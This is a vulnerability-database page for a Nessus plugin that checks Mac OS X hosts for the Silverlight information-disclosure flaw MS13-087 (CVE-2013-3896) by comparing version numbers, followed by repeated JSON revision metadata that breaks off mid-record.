MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) (Mac OS X)
2013-10-09T00:00:00
ID MACOSX_MS13-087.NASL Type nessus Reporter This script is Copyright (C) 2013-2018 Tenable Network Security, Inc. Modified 2019-11-02T00:00:00
Description
The version of Microsoft Silverlight installed on the remote host is
reportedly affected by an information disclosure vulnerability due to
its failure to properly handle certain objects in memory.
If an attacker could trick a user on the affected system into visiting a
website hosting a malicious Silverlight application, the attacker could
leverage this vulnerability to disclose information from the affected
system, subject to the user
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(70341);
script_version("1.11");
script_cvs_date("Date: 2018/07/14 1:59:36");
script_cve_id("CVE-2013-3896");
script_bugtraq_id(62793);
script_xref(name:"MSFT", value:"MS13-087");
script_xref(name:"MSKB", value:"2890788");
script_name(english:"MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) (Mac OS X)");
script_summary(english:"Checks version of Microsoft Silverlight");
script_set_attribute(
attribute:"synopsis",
value:
"A multimedia application framework installed on the remote Mac OS X
host is affected by an information disclosure vulnerability."
);
script_set_attribute(
attribute:"description",
value:
"The version of Microsoft Silverlight installed on the remote host is
reportedly affected by an information disclosure vulnerability due to
its failure to properly handle certain objects in memory.
If an attacker could trick a user on the affected system into visiting a
website hosting a malicious Silverlight application, the attacker could
leverage this vulnerability to disclose information from the affected
system, subject to the user's privileges."
);
script_set_attribute(attribute:"see_also", value:"http://technet.microsoft.com/en-us/security/bulletin/ms13-087");
script_set_attribute(attribute:"solution", value:"Microsoft has released a patch for Silverlight 5.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2013/10/08");
script_set_attribute(attribute:"patch_publication_date", value:"2013/10/08");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/10/09");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:silverlight");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"MacOS X Local Security Checks");
script_copyright(english:"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.");
script_dependencies("macosx_silverlight_installed.nasl");
script_require_keys("Host/local_checks_enabled", "Host/MacOSX/Version", "MacOSX/Silverlight/Installed");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
kb_base = "MacOSX/Silverlight";
get_kb_item_or_exit(kb_base+"/Installed");
path = get_kb_item_or_exit(kb_base+"/Path", exit_code:1);
version = get_kb_item_or_exit(kb_base+"/Version", exit_code:1);
bulletin = "MS13-087";
kb = "2890788";
fixed_version = "5.1.20913.0";
if (version =~ "^5\." && ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)
{
if (defined_func("report_xml_tag")) report_xml_tag(tag:bulletin, value:kb);
if (report_verbosity > 0)
{
report =
'\n Path : ' + path +
'\n Installed version : ' + version +
'\n Fixed version : '+fixed_version +
'\n';
security_warning(port:0, extra:report);
}
else security_warning(0);
exit(0);
}
else exit(0, "The Microsoft Silverlight "+version+" install is not reported to be affected.");
{"id": "MACOSX_MS13-087.NASL", "bulletinFamily": "scanner", "title": "MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) (Mac OS X)", "description": "The version of Microsoft Silverlight installed on the remote host is\nreportedly affected by an information disclosure vulnerability due to\nits failure to properly handle certain objects in memory.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to disclose information from the affected\nsystem, subject to the user", "published": "2013-10-09T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/70341", "reporter": "This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.", "references": ["http://technet.microsoft.com/en-us/security/bulletin/ms13-087"], "cvelist": ["CVE-2013-3896"], "type": "nessus", "lastseen": "2019-11-01T02:54:23", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:microsoft:silverlight"], "cvelist": ["CVE-2013-3896"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "The version of Microsoft Silverlight installed on the remote host is reportedly affected by an information disclosure vulnerability due to its failure to properly handle certain objects in memory.\n\nIf an attacker could trick a user on the affected system into visiting a website hosting a malicious Silverlight application, the attacker could leverage this vulnerability to disclose information from the affected system, subject to the user's privileges.", "edition": 4, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "6f8537c2b3963df8cf3efd5867fad637ee1348aea52757ff2e072bce026faa26", "hashmap": [{"hash": "4aa086755d85a36695b8e69affb42aab", "key": "sourceData"}, {"hash": "8c6af3a225f1659f2a6f41054e5bb0b9", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3f5e7d93403e9b36b59d451ba342d40d", "key": "pluginID"}, {"hash": "3c236091754d2db00c1c42f811b3ada4", "key": "cvss"}, {"hash": "7a954166b9da83bd6711dc28a5796f3d", "key": "published"}, {"hash": "4aee0b8c735f55de97f736b7e3a5e06f", "key": "references"}, {"hash": "d7a2f84f623d9565d812c51123462905", "key": "modified"}, {"hash": "d880aa9ca269f9122c9e15f6a5258772", "key": "cpe"}, {"hash": "bcddca3c795d8bccfe803d579fc7b473", "key": "href"}, {"hash": "3572ac945a58619b006c2cb1cb4d82a9", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4b99df98eaef4ec8988cc0454a083815", "key": "title"}, {"hash": "9415f91090c2218ae67dd519ff399983", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=70341", "id": "MACOSX_MS13-087.NASL", "lastseen": "2018-07-15T04:17:46", "modified": "2018-07-14T00:00:00", "naslFamily": "MacOS X Local Security Checks", "objectVersion": "1.3", "pluginID": "70341", "published": "2013-10-09T00:00:00", "references": ["http://technet.microsoft.com/en-us/security/bulletin/ms13-087"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70341);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2013-3896\");\n script_bugtraq_id(62793);\n script_xref(name:\"MSFT\", value:\"MS13-087\");\n script_xref(name:\"MSKB\", value:\"2890788\");\n\n script_name(english:\"MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) (Mac OS X)\");\n script_summary(english:\"Checks version of Microsoft Silverlight\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A multimedia application framework installed on the remote Mac OS X\nhost is affected by an information disclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Microsoft Silverlight installed on the remote host is\nreportedly affected by an information disclosure vulnerability due to\nits failure to properly handle certain objects in memory.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to disclose information from the affected\nsystem, subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms13-087\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a patch for Silverlight 5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:silverlight\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_silverlight_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Silverlight/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nkb_base = \"MacOSX/Silverlight\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\n\n\nbulletin = \"MS13-087\";\nkb = \"2890788\";\n\nfixed_version = \"5.1.20913.0\";\nif (version =~ \"^5\\.\" && ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n if (defined_func(\"report_xml_tag\")) report_xml_tag(tag:bulletin, value:kb);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : '+fixed_version +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The Microsoft Silverlight \"+version+\" install is not reported to be affected.\");\n", "title": "MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) (Mac OS X)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-07-15T04:17:46"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:microsoft:silverlight"], "cvelist": ["CVE-2013-3896"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "The version of Microsoft Silverlight installed on the remote host is reportedly affected by an information disclosure vulnerability due to its failure to properly handle certain objects in memory.\n\nIf an attacker could trick a user on the affected system into visiting a website hosting a malicious Silverlight application, the attacker could leverage this vulnerability to disclose information from the affected system, subject to the user's privileges.", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-02-21T01:20:08", "references": [{"idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MS13_022_SILVERLIGHT_SCRIPT_OBJECT"], "type": "metasploit"}, {"idList": ["EDB-ID:41702"], "type": "exploitdb"}, {"idList": ["CVE-2013-3896"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310901223", "OPENVAS:1361412562310901224"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:29990", "SECURITYVULNS:VULN:13337"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:124182"], "type": "packetstorm"}, {"idList": ["SMB_NT_MS13-087.NASL"], "type": "nessus"}, {"idList": ["SMNTC-62793"], "type": "symantec"}, {"idList": ["THN:BC65D2F30C85103414F6BD1EC204BB05"], "type": "thn"}, {"idList": ["1337DAY-ID-21573", "1337DAY-ID-27390"], "type": "zdt"}]}, "score": {"modified": "2019-02-21T01:20:08", "value": 5.8, "vector": "NONE"}}, "hash": "6f8537c2b3963df8cf3efd5867fad637ee1348aea52757ff2e072bce026faa26", "hashmap": [{"hash": "4aa086755d85a36695b8e69affb42aab", "key": "sourceData"}, {"hash": "8c6af3a225f1659f2a6f41054e5bb0b9", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3f5e7d93403e9b36b59d451ba342d40d", "key": "pluginID"}, {"hash": "3c236091754d2db00c1c42f811b3ada4", "key": "cvss"}, {"hash": "7a954166b9da83bd6711dc28a5796f3d", "key": "published"}, {"hash": "4aee0b8c735f55de97f736b7e3a5e06f", "key": "references"}, {"hash": "d7a2f84f623d9565d812c51123462905", "key": "modified"}, {"hash": "d880aa9ca269f9122c9e15f6a5258772", "key": "cpe"}, {"hash": "bcddca3c795d8bccfe803d579fc7b473", "key": "href"}, {"hash": "3572ac945a58619b006c2cb1cb4d82a9", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4b99df98eaef4ec8988cc0454a083815", "key": "title"}, {"hash": "9415f91090c2218ae67dd519ff399983", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=70341", "id": "MACOSX_MS13-087.NASL", "lastseen": "2019-02-21T01:20:08", "modified": "2018-07-14T00:00:00", "naslFamily": "MacOS X Local Security Checks", "objectVersion": "1.3", "pluginID": "70341", "published": "2013-10-09T00:00:00", "references": ["http://technet.microsoft.com/en-us/security/bulletin/ms13-087"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70341);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2013-3896\");\n script_bugtraq_id(62793);\n script_xref(name:\"MSFT\", value:\"MS13-087\");\n script_xref(name:\"MSKB\", value:\"2890788\");\n\n script_name(english:\"MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) (Mac OS X)\");\n script_summary(english:\"Checks version of Microsoft Silverlight\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A multimedia application framework installed on the remote Mac OS X\nhost is affected by an information disclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Microsoft Silverlight installed on the remote host is\nreportedly affected by an information disclosure vulnerability due to\nits failure to properly handle certain objects in memory.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to disclose information from the affected\nsystem, subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms13-087\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a patch for Silverlight 5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:silverlight\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_silverlight_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Silverlight/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nkb_base = \"MacOSX/Silverlight\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\n\n\nbulletin = \"MS13-087\";\nkb = \"2890788\";\n\nfixed_version = \"5.1.20913.0\";\nif (version =~ \"^5\\.\" && ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n if (defined_func(\"report_xml_tag\")) report_xml_tag(tag:bulletin, value:kb);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : '+fixed_version +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The Microsoft Silverlight \"+version+\" install is not reported to be affected.\");\n", "title": "MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) (Mac OS X)", "type": "nessus", "viewCount": 3}, "differentElements": ["cvss", "description", "reporter", "modified", "href"], "edition": 8, "lastseen": "2019-02-21T01:20:08"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:microsoft:silverlight"], "cvelist": ["CVE-2013-3896"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The version of Microsoft Silverlight installed on the remote host is reportedly affected by an information disclosure vulnerability due to its failure to properly handle certain objects in memory.\n\nIf an attacker could trick a user on the affected system into visiting a website hosting a malicious Silverlight application, the attacker could leverage this vulnerability to disclose information from the affected system, subject to the user's privileges.", "edition": 5, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "2c2f2f63e130db51131e671c408895efb3b89f66c130a73605ca608de70daf4b", "hashmap": [{"hash": "4aa086755d85a36695b8e69affb42aab", "key": "sourceData"}, {"hash": "8c6af3a225f1659f2a6f41054e5bb0b9", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3f5e7d93403e9b36b59d451ba342d40d", "key": "pluginID"}, {"hash": "7a954166b9da83bd6711dc28a5796f3d", "key": "published"}, {"hash": "4aee0b8c735f55de97f736b7e3a5e06f", "key": "references"}, {"hash": "d7a2f84f623d9565d812c51123462905", "key": "modified"}, {"hash": "d880aa9ca269f9122c9e15f6a5258772", "key": "cpe"}, {"hash": "bcddca3c795d8bccfe803d579fc7b473", "key": "href"}, {"hash": "3572ac945a58619b006c2cb1cb4d82a9", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4b99df98eaef4ec8988cc0454a083815", "key": "title"}, {"hash": "9415f91090c2218ae67dd519ff399983", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=70341", "id": "MACOSX_MS13-087.NASL", "lastseen": "2018-08-30T19:55:28", "modified": "2018-07-14T00:00:00", "naslFamily": "MacOS X Local Security Checks", "objectVersion": "1.3", "pluginID": "70341", "published": "2013-10-09T00:00:00", "references": ["http://technet.microsoft.com/en-us/security/bulletin/ms13-087"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70341);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2013-3896\");\n script_bugtraq_id(62793);\n script_xref(name:\"MSFT\", value:\"MS13-087\");\n script_xref(name:\"MSKB\", value:\"2890788\");\n\n script_name(english:\"MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) (Mac OS X)\");\n script_summary(english:\"Checks version of Microsoft Silverlight\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A multimedia application framework installed on the remote Mac OS X\nhost is affected by an information disclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Microsoft Silverlight installed on the remote host is\nreportedly affected by an information disclosure vulnerability due to\nits failure to properly handle certain objects in memory.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to disclose information from the affected\nsystem, subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms13-087\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a patch for Silverlight 5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:silverlight\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_silverlight_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Silverlight/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nkb_base = \"MacOSX/Silverlight\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\n\n\nbulletin = \"MS13-087\";\nkb = \"2890788\";\n\nfixed_version = \"5.1.20913.0\";\nif (version =~ \"^5\\.\" && ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n if (defined_func(\"report_xml_tag\")) report_xml_tag(tag:bulletin, value:kb);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : '+fixed_version +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The Microsoft Silverlight \"+version+\" install is not reported to be affected.\");\n", "title": "MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) (Mac OS X)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 5, "lastseen": "2018-08-30T19:55:28"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:microsoft:silverlight"], "cvelist": ["CVE-2013-3896"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "The version of Microsoft Silverlight installed on the remote host is reportedly affected by an information disclosure vulnerability due to its failure to properly handle certain objects in memory.\n\nIf an attacker could trick a user on the affected system into visiting a website hosting a malicious Silverlight application, the attacker could leverage this vulnerability to disclose information from the affected system, subject to the user's privileges.", "edition": 6, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "6f8537c2b3963df8cf3efd5867fad637ee1348aea52757ff2e072bce026faa26", "hashmap": [{"hash": "4aa086755d85a36695b8e69affb42aab", "key": "sourceData"}, {"hash": "8c6af3a225f1659f2a6f41054e5bb0b9", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3f5e7d93403e9b36b59d451ba342d40d", "key": "pluginID"}, {"hash": "3c236091754d2db00c1c42f811b3ada4", "key": "cvss"}, {"hash": "7a954166b9da83bd6711dc28a5796f3d", "key": "published"}, {"hash": "4aee0b8c735f55de97f736b7e3a5e06f", "key": "references"}, {"hash": "d7a2f84f623d9565d812c51123462905", "key": "modified"}, {"hash": "d880aa9ca269f9122c9e15f6a5258772", "key": "cpe"}, {"hash": "bcddca3c795d8bccfe803d579fc7b473", "key": "href"}, {"hash": "3572ac945a58619b006c2cb1cb4d82a9", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4b99df98eaef4ec8988cc0454a083815", "key": "title"}, {"hash": "9415f91090c2218ae67dd519ff399983", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=70341", "id": "MACOSX_MS13-087.NASL", "lastseen": "2018-09-02T00:06:18", "modified": "2018-07-14T00:00:00", "naslFamily": "MacOS X Local Security Checks", "objectVersion": "1.3", "pluginID": "70341", "published": "2013-10-09T00:00:00", "references": ["http://technet.microsoft.com/en-us/security/bulletin/ms13-087"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70341);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2013-3896\");\n script_bugtraq_id(62793);\n script_xref(name:\"MSFT\", value:\"MS13-087\");\n script_xref(name:\"MSKB\", value:\"2890788\");\n\n script_name(english:\"MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) (Mac OS X)\");\n script_summary(english:\"Checks version of Microsoft Silverlight\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A multimedia application framework installed on the remote Mac OS X\nhost is affected by an information disclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Microsoft Silverlight installed on the remote host is\nreportedly affected by an information disclosure vulnerability due to\nits failure to properly handle certain objects in memory.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to disclose information from the affected\nsystem, subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms13-087\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a patch for Silverlight 5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:silverlight\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_silverlight_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Silverlight/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nkb_base = \"MacOSX/Silverlight\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\n\n\nbulletin = \"MS13-087\";\nkb = \"2890788\";\n\nfixed_version = \"5.1.20913.0\";\nif (version =~ \"^5\\.\" && ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n if (defined_func(\"report_xml_tag\")) report_xml_tag(tag:bulletin, value:kb);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : '+fixed_version +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The Microsoft Silverlight \"+version+\" install is not reported to be affected.\");\n", "title": "MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) (Mac OS X)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 6, "lastseen": "2018-09-02T00:06:18"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:microsoft:silverlight"], "cvelist": ["CVE-2013-3896"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "description": "The version of Microsoft Silverlight installed on the remote host is\nreportedly affected by an information disclosure vulnerability due to\nits failure to properly handle certain objects in memory.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to disclose information from the affected\nsystem, subject to the user", "edition": 9, "enchantments": {"dependencies": {"modified": "2019-10-28T20:40:23", "references": [{"idList": 